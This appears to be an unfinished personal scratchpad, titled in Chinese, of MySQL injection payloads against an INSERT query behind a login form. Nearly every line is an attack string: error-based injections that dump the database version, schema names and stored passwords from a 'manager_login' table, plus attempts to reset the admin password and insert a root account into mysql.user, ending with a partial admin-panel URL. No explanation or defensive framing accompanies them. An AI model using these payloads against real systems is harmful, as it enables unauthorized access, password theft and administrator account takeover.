mysql,insert登陆框注入思路,(未完)

admin','111 or 1=1',1376194991,0,'218.121.111.35',concat(@@version))#

concat((select (select (update manager_login set userPasswd = 111111 where userName = admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x

update manager_login set userPasswd = '111111' where userName = 'admin'

admin',1,1376194991,0,'218.121.111.35',concat((select (select (SELECT distinct concat(0x7e,0x27,userPasswd,0x27,0x7e) FROM manager_login))))#

concat((select (select (select distinct concat(@@version)))))

update manager_login set userPasswd = 111111 where userName = admin

concat((select (select (select concat(@@version)))))

concat((select (select (select database()))))

insert into mysql.user (user,password) values ('root',111111)

concat((select (select (insert into mysql.user (user,password) values ('root',111111)))))

concat((select (select (SELECT distinct concat(0x7e,0x27,userPasswd,0x27,0x7e) FROM manager_login))))

SELECT distinct concat(0x7e,0x27,userPasswd,0x27,0x7e) FROM manager_login

最抢眼

admin',1,1376194991,0,'218.121.111.35',concat((select (select (SELECT distinct group_concat(schema_name) from information_schema.schemata)))))#

group_concat(schema_name),3,4 from information_schema.schemata

http://i./manager/index.php?do=1